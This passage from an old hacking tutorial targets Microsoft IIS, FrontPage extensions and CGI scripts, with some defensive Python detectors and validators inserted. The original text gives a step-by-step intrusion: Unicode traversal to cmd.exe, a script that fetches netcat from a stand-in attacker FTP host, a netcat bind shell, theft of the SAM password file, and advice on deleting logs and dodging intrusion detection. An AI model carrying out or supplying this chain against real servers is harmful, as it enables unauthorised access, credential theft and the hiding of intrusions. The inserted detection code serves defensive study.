** If this file is there then you may be able
** to upload files to the server.

/scripts/uploadn.asp

** Connecting to this page gives you a nice
** gui for uploading your own webpages. You
** probably need to brute the userid.

There are lots more example scripts in the default install and quite a few
of them are very, very insecure. Microsoft recommends that you remove ALL
samples from any production server including the ExAir, WSH, ADO and other
installed samples.

IIS Default Web Site
--------------------

IISSAMPLES - c:\inetpub\iissamples
IISADMIN - c:\winnt\system32\inetsrv\iisadmin
IISHELP - c:\winnt\help
SCRIPTS - c:\inetpub\scripts
IISADMPWD - c:\winnt\system32\inetsrv\iisadmpwd
msadc - c:\program files\common files\system\msadc
logfiles - c:\winnt\system32\logfiles
default.htm - c:\inetpub\wwwroot

IIS Default App Mapping
-----------------------

.asa - c:\winnt\system32\inetsrv\asp.dll
.asp - c:\winnt\system32\inetsrv\asp.dll
.cdx - c:\winnt\system32\inetsrv\asp.dll
.cer - c:\winnt\system32\inetsrv\asp.dll
.htr - c:\winnt\system32\inetsrv\ism.dll
.idc - c:\winnt\system32\inetsrv\httpodbc.dll
.shtm - c:\winnt\system32\inetsrv\ssinc.dll
.shtml - c:\winnt\system32\inetsrv\ssinc.dll
.stm - c:\winnt\system32\inetsrv\ssinc.dll
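As an added example (not code from the original guide), here is a small Python detector that looks for the request tricks catalogued in this section in IIS W3C extended log lines. The log lines are constructed, the rule names are mine, and the field order is whatever the log's own #Fields directive declares; the last sample line uses the ..%c0%af form that the seventh-day section covers. It assumes the relevant fields are cs-uri-stem, cs-uri-query and sc-status.

```python
# Added example (not from the original guide): run the fourth-day request
# tricks over IIS W3C extended log lines.  The log is constructed; the field
# order is the one declared in its own #Fields header.
import re
from urllib.parse import unquote

SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-03-01 10:00:01 192.0.2.10 GET /default.asp - 200
2001-03-01 10:00:02 192.0.2.10 GET /default.asp. - 200
2001-03-01 10:00:03 192.0.2.10 GET /index.asp::$DATA - 200
2001-03-01 10:00:04 192.0.2.10 GET /global.asa+.htr - 200
2001-03-01 10:00:05 192.0.2.10 GET /iissamples/exair/howitworks/codebrws.asp source=/msadc/Samples/../../../../boot.ini 200
2001-03-01 10:00:06 192.0.2.10 GET /AdvWorks/equipment/catalog_type.asp ProductType=|shell("cmd+/c+dir+c:\")| 200
2001-03-01 10:00:07 192.0.2.10 GET /query.idq CiTemplate=../../../boot.ini 200
2001-03-01 10:00:08 192.0.2.10 GET /scripts/cpshost.dll PUBLISH?/scripts/dodgy.asp 200
2001-03-01 10:00:09 192.0.2.10 GET /msadc/msadcs.dll - 200
2001-03-01 10:00:10 192.0.2.10 GET /anything.idc - 404
2001-03-01 10:00:11 192.0.2.10 GET /somedir/anything.stm/somedir/index.asp - 200
2001-03-01 10:00:12 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\ 200
2001-03-01 10:00:13 192.0.2.11 GET /images/logo.gif - 200
"""

# (name, pattern, match_on_raw).  Patterns run against the percent-decoded URI
# unless match_on_raw is set: over-long UTF-8 only survives in the raw form,
# because a decoder turns it into a replacement character.
RULES = [
    ("asp-source-trailing-dot",  re.compile(r"\.asp\.+(\?|$)", re.I), False),
    ("ntfs-data-stream",         re.compile(r"::\$data", re.I), False),
    ("htr-source-suffix",        re.compile(r"\.(asp|asa|idc|inc)[ +]+\.htr(\?|$)", re.I), False),
    ("sample-source-viewer",     re.compile(r"(codebrws|showcode)\.asp\?.*source=.*\.\.", re.I), False),
    ("asp-shell-call",           re.compile(r"shell\(", re.I), False),
    ("idq-citemplate-traversal", re.compile(r"\.idq\?.*citemplate=.*\.\.", re.I), False),
    ("posting-acceptor-publish", re.compile(r"cpshost\.dll\?publish", re.I), False),
    ("rds-msadcs-probe",         re.compile(r"/msadc/msadcs\.dll", re.I), False),
    ("stm-path-append",          re.compile(r"\.stm/.+\.(asp|asa|idc|inc)", re.I), False),
    ("overlong-utf8-traversal",  re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I), True),
]
WEBROOT_PROBE_EXT = re.compile(r"\.(idc|ida|idq|stm)$", re.I)


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):      # skip malformed lines rather than crash
                yield dict(zip(fields, parts))


def classify(entry):
    """Return the names of every rule that matches one log entry."""
    stem, query = entry["cs-uri-stem"], entry["cs-uri-query"]
    raw = stem if query == "-" else f"{stem}?{query}"
    decoded = unquote(raw, errors="replace")   # %2e -> '.', %20 -> ' ', bad UTF-8 -> U+FFFD
    hits = [name for name, pat, on_raw in RULES if pat.search(raw if on_raw else decoded)]
    # the "request a non-existent .idc/.ida/.idq/.stm" web-root trick only
    # shows up as a 404, so the status code is part of the signature
    if entry["sc-status"] == "404" and WEBROOT_PROBE_EXT.search(stem):
        hits.append("webroot-disclosure-probe")
    return hits


def scan(text):
    """Return (client ip, uri stem, [rule names]) for every entry matching a rule."""
    findings = []
    for entry in parse_w3c(text):
        hits = classify(entry)
        if hits:
            findings.append((entry["c-ip"], entry["cs-uri-stem"], hits))
    return findings


if __name__ == "__main__":
    for ip, uri, hits in scan(SAMPLE_LOG):
        print(f"{ip} {uri} -> {', '.join(hits)}")
```

Most rules run on the decoded URI because IIS versions differ in whether cs-uri-stem is logged as received or already decoded, and decoding first makes %2e and %20 variants fall into the same rule. The tool is deliberately signature based: it tells you that one of the sample scripts or app mappings listed above is being poked at, which is the cue to remove the samples and mappings rather than to keep extending the rule list.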





--[On the fifth day, God created Frontpage Extensions]

Microsoft Frontpage (Originally developed by Vermeer Tech Inc, if you've
ever wondered why they use _vti_) is a web design tool that helps you
create and maintain a web site and allows you to publish it to the web
server.

In order to publish using Frontpage the server needs to run certain
programs, collectively called the Frontpage Server Extensions.

Sounds good I hear you say, but there are many, many security holes in
Frontpage. You can list all the files, download password files and upload
your own files on Frontpage enabled sites.

When you publish a file, Frontpage attempts to read the following URL to
get all the information it needs to publish:

http://www.myserver.com/_vti_inf.html

Then Frontpage uses the following URL to POST the files to the site:

http://www.myserver.com/_vti_bin/shtml.exe/_vti_rpc

It will come as no surprise that this file is not protected and open to
abuse.

All information for the site is stored in the /_vti_pvt/ dir, and it's world
readable. Here are some of the things you can look for:

http://www.myserver.com/_vti_pvt/administrators.pwd
http://www.myserver.com/_vti_pvt/authors.pwd
http://www.myserver.com/_vti_pvt/service.pwd
http://www.myserver.com/_vti_pvt/shtml.dll
http://www.myserver.com/_vti_pvt/shtml.exe
http://www.myserver.com/_vti_pvt/users.pwd
http://www.myserver.com/_private

--[On the sixth day, God created CGI]--

The Common Gateway Interface (CGI) is a standard for interfacing external
applications to the web server. A CGI program is executed in real time and
is used to create dynamic web sites.

Generally, the CGI programs are kept in '/cgi-bin/' but can be placed
anywhere. The programs can be written in most languages but typically they are
written in C, Perl or shell scripts.

Many sites will use freely available, downloadable scripts from places like
Matt's Trojan, erm, I mean Matt's Script Archive. It's always a good idea to
look through the source of the scripts for bad system calls and lax input
validation.

CGI deserves a tutorial all to itself and I strongly suggest that you read
the following tutorials... they explain it better than I ever could:

Hacking CGI - http://shells.cyberarmy.com/~johnr/docs/cgi/cgi.txt
Perl CGI Problems - http://www.phrack.com/phrack/55/P55-07

Just to get you in the mood we will have a brief look at CGI exploitation.
There are three main types of CGI hacking; URL encoding attacks, input
validation exploits and buffer overflows.

The first thing to keep in mind is that you are already able to exploit cgi
using the techniques from previous sections. First, we need to cover some
background. CGI can take lots of shapes and forms. One popular use is via
web based forms that submit information to a CGI via a GET or POST.

<FORM NAME="myform" METHOD="GET" ACTION="../cgi-bin/my_cgi.cgi">

When the user clicks on the submit button his information is passed to the
CGI script to process either via the URL (GET) or via HTTP headers (POST).

Let's assume that the CGI we are going to exploit asks the user for the name
of a file to display. The 'GET' method uses the URL to pass the information
and it would look like this:

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd

Let's break that down:

? - separates the request from the parameters
filename - this is the name of the textbox in the html
= - assignment for the parameter/value pair
/etc/passwd - this is what the user typed into the box

You can have multiple fields within a HTML form and these will also be
passed to the CGI. They are separated using a '&':

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd&user=fugjostle

If you were thinking how you could alter the user supplied input to break
the CGI then good, you're starting to think in terms of security. Lots of
developers love to program new and interesting things but they do not
consider security. A security conscious programmer would write input
validation routines that would process the data and ensure the user wasn't
being malicious or curious.

As you read through some of the free scripts on the web you will start to
realise that many programmers do not think about security. Let's look briefly
at some ways we could exploit the CGI. The first thing to keep in mind is
that you already know the generic exploits from the previous section. The
only area in which we are lacking is programming language specific info.

We will stick with the example cgi that opens a file (and let's assume
it's written in Perl). Let's look at some of the things we can try:

my_cgi.pl?filename=../../../../../etc/passwd

and let's do the same thing but encode the URL to bypass security checks:

my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd

If you have read the RFP document above then you will be familiar with
poison null bytes. Stop now and go read it... can't be arsed? ok then,
here's the quick version. %00 is valid in a string with Perl but is NUL
in C. So? When Perl wants to open the file it makes a request to the
operating system through a system call. The operating system is written in
C and %00 is a string delimiter. Let's apply this technique to the
following situation.

I decide to secure my CGI. I append '.html' to any request. This means that
the user can only view html files and if they try something else then it
doesn't exist. wh00p @ me :-)

But... what if I was to do the following:

my_cgi.pl?filename=../../../../etc/passwd%00

In Perl the filename string would look like this:

"../../../../etc/passwd\0.html"

Perfectly valid under Perl. I have done my job... or have I? When this is
passed to the OS (which is written in C not Perl) the request looks like
this:

"../../../../etc/passwd"

The OS identifies %00 as the string delimiter and ignores anything that
comes after it. The webserver then displays the /etc/passwd file... bugger :-(
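The 'open the file the user named' CGI from this section, as an added example written for this page (it is not the guide's script and the guide's script is in Perl, not Python). naive_target() reproduces the .html-suffix defence described above and models what the C-level open() actually receives; safe_target() is the validation a reviewer would ask for instead. DOCROOT, the function names and the control-character and traversal rules are assumptions for this example.

```python
# Added example (not from the original guide): the guide's filename CGI
# modelled in Python.  Python's own open() refuses NUL in a path, so the
# C-string truncation is modelled explicitly with split().
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html"        # assumed document root for the example


def naive_target(user_value):
    """Return (string the script built, string the OS sees).

    The script decodes the parameter, appends '.html' and hands the result
    to the OS.  C treats the first NUL as the end of the string, so anything
    after a %00 silently disappears; split() models that truncation.
    """
    built = unquote(user_value) + ".html"
    seen_by_os = built.split("\0", 1)[0]
    return built, seen_by_os


def safe_target(user_value):
    """Resolve a user-supplied name to a path confined under DOCROOT, or raise."""
    name = unquote(user_value)                   # decode exactly once, never twice
    if any(ord(ch) < 0x20 for ch in name):       # NUL and every other control char
        raise ValueError("control character in filename")
    if name.startswith("/") or "\\" in name:
        raise ValueError("absolute path or backslash in filename")
    normalised = posixpath.normpath(name)        # collapses 'a/../b', './x', '//'
    if normalised in (".", "", "..") or normalised.startswith("../"):
        raise ValueError("path traversal or empty name")
    candidate = posixpath.join(DOCROOT, normalised + ".html")
    # belt and braces: the canonical result must still sit under DOCROOT
    if posixpath.commonpath([DOCROOT, candidate]) != DOCROOT:
        raise ValueError("path escapes document root")
    return candidate


def rejected(user_value):
    """True if safe_target() refuses the value (handy for tests and logging)."""
    try:
        safe_target(user_value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for value in ("news", "../../../../etc/passwd%00", "..%2f..%2fetc%2fpasswd"):
        built, seen = naive_target(value)
        print(f"{value!r}: script built {built!r}, OS opened {seen!r}, "
              f"hardened check {'rejects' if rejected(value) else 'accepts'}")
```

The order of the checks matters: the control-character test runs on the decoded string before any suffix is appended, so the %00 trick is caught where it appears, and the traversal test runs on the normalised path rather than on the raw text, so '..%2f' and 'docs/../../etc' are treated the same as a literal '../'. With a strict percent-decoder the '%c0%af' variant from the encoded-URL example never becomes a '/' at all; it decodes to a replacement character and stays inside a single filename component.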


Many people download scripts from the web and look for problems in the
script. Then the wily hax0r will go to altavista and search for sites
that are using that script, eg:

url:pollit.cgi

and good old altavista provides a list of sites that are just ripe for the
taking.

The final method of exploiting CGI is via buffer overflows. Languages like
Java and Perl are immune to buffer overflows because the language looks
after memory management. Programs written in a language such as C are
vulnerable because the programmer is supposed to manage the memory. Some
programmers fail to check the size of the data they are fitting into the
memory buffer and overwrite data on the stack.

The goal of the buffer overflow is to overwrite the instruction pointer
which points to the location of the next bit of code to run. An attacker
will attempt to overwrite this pointer with a new pointer that points to
the attacker's code, usually a root shell.

Quite a few CGIs exist that are vulnerable to this type of attack. For
example, counter.exe is one such CGI. Writing 2000 A's to the CGI causes
a Denial of Service (DoS).

The details of buffer overflows are beyond the scope of this document.
Look out for a future release ;-)

If you want to dig deeper into buffer overflows then have a look at:

http://www.phrack.com/phrack/49/P49-14

--[On the seventh day, God chilled and haxored the planet]

Well.. I guess it's time we actually tried some of the things discussed but
I'm not going to cover everything. I suggest going to the following URLs
and searching for IIS:

http://www.securityfocus.com/
http://www.packetstormsecurity.com/

My main reason for doing this file was to better understand Unicode exploits
and so that is going to be the focus of the exploitation. The first exploit
I'm going to go through is the recent Unicode exploit for IIS4/5:

http://www.securityfocus.com/bid/1806

Before I get emails saying 'hold on, you said that %xx%xx is UTF-8' let me
explain. This had wide exposure on Bugtraq as the Unicode exploit. In
reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep
calling this the Unicode exploit because it's now referenced by this name in
the Bugtraq archives and you'll have to search using Unicode to do further
research.

Ok, rant over... To check if the server is exploitable, request the
following URL:

http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

You should get a directory listing of the C:\ drive on the target server.
The important thing to note is that the Unicode string can vary depending
where in the world you are. Some possible alternatives include:

%c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc

There are many more to choose from, just look at some of the Bugtraq posts or
research UTF-8 for more alternatives.
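The author's point that this is a UTF-8 rather than a Unicode problem is easiest to see in a decoder. As an added example that is not part of the original guide, the Python below walks UTF-8 byte sequences by bit arithmetic: with strict=False it behaves like a decoder that trusts the bit pattern alone (so C0 AF yields '/' and C1 9C yields '\'), and with strict=True it rejects those over-long forms, which is what RFC 3629 requires and what a patched decoder does. The helper names and the has_dotdot_segment() check are mine.

```python
# Added example (not from the original guide): a UTF-8 decoder with and
# without the over-long check, applied to percent-encoded request paths.
from urllib.parse import unquote_to_bytes

MIN_CODEPOINT = (0x0, 0x80, 0x800, 0x10000)   # smallest value a 1..4-byte form may carry


def _lead(b):
    """(payload bits, number of continuation bytes) for a lead byte, else None."""
    if b < 0x80:
        return b, 0
    if 0xC0 <= b <= 0xDF:
        return b & 0x1F, 1
    if 0xE0 <= b <= 0xEF:
        return b & 0x0F, 2
    if 0xF0 <= b <= 0xF7:
        return b & 0x07, 3
    return None                                   # stray continuation byte or 0xF8+


def decode_utf8(data, strict=True):
    """Decode bytes to str.  strict=False mirrors a decoder that trusts the bit
    pattern alone, so C0 AF becomes '/' and C1 9C becomes a backslash."""
    out, i = [], 0
    while i < len(data):
        lead = _lead(data[i])
        if lead is None:
            raise ValueError(f"invalid lead byte 0x{data[i]:02x} at {i}")
        cp, n = lead
        start, i = i, i + 1
        for _ in range(n):
            if i >= len(data) or data[i] & 0xC0 != 0x80:
                raise ValueError(f"truncated sequence at {start}")
            cp = (cp << 6) | (data[i] & 0x3F)
            i += 1
        if strict:
            if cp < MIN_CODEPOINT[n]:             # the check the vulnerable decoder lacked
                raise ValueError(f"over-long encoding at {start}")
            if 0xD800 <= cp <= 0xDFFF or cp > 0x10FFFF:
                raise ValueError(f"invalid code point at {start}")
        out.append(chr(cp))
    return "".join(out)


def decode_url_path(url_path, strict=True):
    """Percent-decode to bytes first, then UTF-8-decode: '%c0%af' has to be
    reassembled into two bytes before the UTF-8 stage can see the problem."""
    return decode_utf8(unquote_to_bytes(url_path), strict)


def has_dotdot_segment(url_path, strict=True):
    """True if the decoded path contains a '..' segment, False if not, and
    None if the strict decoder refused the path (reject the request)."""
    try:
        text = decode_url_path(url_path, strict)
    except ValueError:
        return None
    return ".." in text.replace("\\", "/").split("/")


def strict_rejects(data):
    """True if the strict decoder raises on these bytes."""
    try:
        decode_utf8(data, strict=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    path = "/scripts/..%c0%af../winnt/system32/cmd.exe"
    print("lenient:", decode_url_path(path, strict=False))
    print("strict :", has_dotdot_segment(path))    # None: refused before any path check
```

Two things follow for anyone checking paths. The path-traversal test has to run on the fully decoded string, not on the raw request, or the '..' that the over-long byte pair produces is never seen; and a decoder that enforces the minimum code point per sequence length removes the whole class rather than one encoding of it. The lenient mode still requires proper continuation bytes, so of the alternatives listed above only the forms whose second byte is in the 0x80-0xBF range decode at all here.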


OK, you can read the directory... what next? You have the directory listing
and the ability to run commands, so you need to find the web root. By default,
the web root is at:

c:\inetpub\wwwroot\

If it's not there then go and look for it. Let's write a text file there and
see if we can see it:

cmd.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

hmmm.. it seems that we don't have write access. Ok, no problem we can get
around that by creating a copy of the cmd.exe that has write privileges:

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\fug.exe

Let's check if it worked:

http://target.com/scripts/..%c0%af../winnt/system32/fug.exe?/c+dir+c:\

Yep.. all's good so far. Let's try and write to the web root:

fug.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

Let's open it up in the browser and see if we can see it:

http://target.com/test.txt

w00t!!! Write access!!! Right, we now have some options open to us. In the
words of Microsoft, where do you want to go today? Working via the URL is
pretty clunky and I like the comfort of a nice command prompt, so let's do
that. I want to bring over a copy of netcat and a nice html page that I'll
use to replace the existing one.

First I need to think about the script I want to run that will get the
files I need from my FTP server:

fugscript:

open ftp.evilhaxor.com
anonymous
anon@microsoft.com
cd pub
get nc.exe
get hacked.html
quit

Right. I need to get this script onto the webserver:

fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript
fug.exe?/c+echo%20anonymous>>fugscript
fug.exe?/c+echo%20anon@microsoft.com>>fugscript
fug.exe?/c+echo%20cd%20pub>>fugscript
fug.exe?/c+echo%20get%20nc.exe>>fugscript
fug.exe?/c+echo%20get%20hacked.html>>fugscript
fug.exe?/c+echo%20quit>>fugscript

OK.. now we have created a script on the server called fugscript. Next step
is to execute the script and get my files from my web server.

fug.exe?/c+ftp%20-s:fugscript

If all goes well the server should begin the FTP transfer and get your files
transferred. Be patient and give it time to transfer. Now you are ready to
get netcat listening on a port. The command line for starting netcat is:

nc.exe -l -p 6667 -e cmd.exe

This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e)
when someone connects. The last step is to translate this command into URL
speak ;-):

fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe

Fire up a telnet session and connect to port 6667 on the target system and
voila... you have a cmd prompt. I really hate web defacements... so if you're
going to do it then rename the existing index.htm (or default.htm) to
something like index.htm.old (give the poor admin a break, cause you can bet
your arse that he hasn't made a backup). ALSO: you are now using a system
without authorisation and as such, you are guilty under the Computer Misuse
Act in the UK and probably of something similar in your own country. If it
never occurred to you to delete the contents of c:\winnt\system32\logfiles
or the 'fugscript' file then you really shouldn't be doing this.

It just wouldn't be right to talk about IIS exploitation without mentioning
msadc.pl. rfp's perl script is a perfect example of exploit chaining. A
single exploit is not used but a chain of exploits to get the script to
work.

The exploit utilises a combination of inadequate application input validation
and default install fun. The process tries to connect to a Data Source Name
(DSN) to execute commands.

rfp's script tests for the existence of /msadc/msadc.dll using the GET method.
This test will be logged and you should edit the script to make it a HEAD
request and add some URL obfuscation madness.

The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME
separator string. It is advised to change this string as some IDSs are
configured to identify this string.

If you want to write your own scanners then you should be looking for
headers with the content type:

application/x-varg

and of course the IIS version :-) I don't want to go into too much detail
because this is heavily documented on rfp's site:

http://www.wiretrip.net/rfp/
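The two previous paragraphs make a point worth turning into code from the defender's side: an IDS keyed only on the default separator string is defeated by the one-line edit the text recommends, while the endpoint and the application/x-varg content type are what the request must carry to work at all. As an added example (not code from the original guide or from rfp's script), the Python below parses a raw HTTP request and reports which of those signals fire. The requests are constructed and the bodies are placeholders around the marker string, not real RDS payloads; the signal names are mine.

```python
# Added example (not from the original guide): inspect one raw HTTP request
# for the RDS (msadcs.dll) shape the text describes.  Requests are constructed.
DEFAULT_SEPARATOR = "!ADM!ROX!YOUR!WORLD!"     # the default marker named in the text
RDS_ENDPOINT = "/msadc/msadcs.dll"
RDS_CONTENT_TYPE = "application/x-varg"


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_rds(raw):
    """Return the signals that fire for one request, most robust first."""
    method, path, headers, body = parse_request(raw)
    content_type = headers.get("content-type", "").split(";")[0].strip().lower()
    signals = []
    if path.split("?")[0].lower().endswith(RDS_ENDPOINT):
        signals.append("rds-endpoint")             # GET/HEAD probe or the real request
        if method == "POST" and content_type == RDS_CONTENT_TYPE:
            signals.append("rds-post-x-varg")      # survives a renamed separator
    if DEFAULT_SEPARATOR in body:
        signals.append("default-msadc-separator")  # brittle: the sender can change it
    return signals


def _request(separator):
    """Build a constructed POST with a placeholder body around the separator."""
    body = f"--{separator}\r\n<constructed placeholder body>\r\n--{separator}--\r\n"
    return (
        "POST /msadc/msadcs.dll HTTP/1.0\r\n"
        "Host: www.example.com\r\n"
        f"Content-Type: {RDS_CONTENT_TYPE}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n" + body
    )


REQ_DEFAULT_MARKER = _request(DEFAULT_SEPARATOR)
REQ_RENAMED_MARKER = _request("!SOMETHING!ELSE!")   # separator changed, as the text suggests
REQ_HEAD_PROBE = "HEAD /msadc/msadcs.dll HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
REQ_BENIGN = "GET /default.htm HTTP/1.0\r\nHost: www.example.com\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("default", REQ_DEFAULT_MARKER), ("renamed", REQ_RENAMED_MARKER),
                       ("head", REQ_HEAD_PROBE), ("benign", REQ_BENIGN)):
        print(f"{label:8} -> {inspect_rds(req)}")
```

The HEAD probe still trips the endpoint signal: switching the existence check from GET to HEAD changes nothing from the server's point of view, because IIS logs both. The real fix is the one the first paragraph of this page implies, removing the msadc virtual directory where RDS is not needed, at which point the request fails regardless of how it is dressed up.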


How do I use it? I hear you cry... well, it's child's play:

./msadc2.pl -h www.target.com

If all goes well then you should be presented with the following:

command:

It's interesting to note at this point that 'cmd /c' is run, as with the
previous exploit. You can edit the script to run any other executable such
as 'rdisk /s' instead.

This is good, you can now enter the command you want to run on the server.
The previous Unicode exploit should have given you some ideas but here's a
couple that come to mind:

Example 1:

copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\fug.hak

(grabbing fug.hak via your browser should give you a nice file to fire up
in L0phtcrack or JTR)

Example 2:

echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript
&& echo mypassword>>fugscript... etc. etc.

Anyway, that's about all for now. When I can be bothered I'll add some more
methods to this file. Until then, ensure your box is fully patched and the
default scripts are removed. Go have a look at the following URL and get
secure:

http://www.microsoft.com/security/

***************************************************************************
Greetz to: ReDeeMeR, BarnseyBoy, Reeferman, gabbana, think12, Wang, Enstyne,
[502BOP], Muad_Dib, Macster, n0face, palmito, kph, Homicide, Col,
Axem, Booto, _Penguin, nsh, Chawmp, shad, hellz and everyone in
#CA who are way too numerous to mention.
***************************************************************************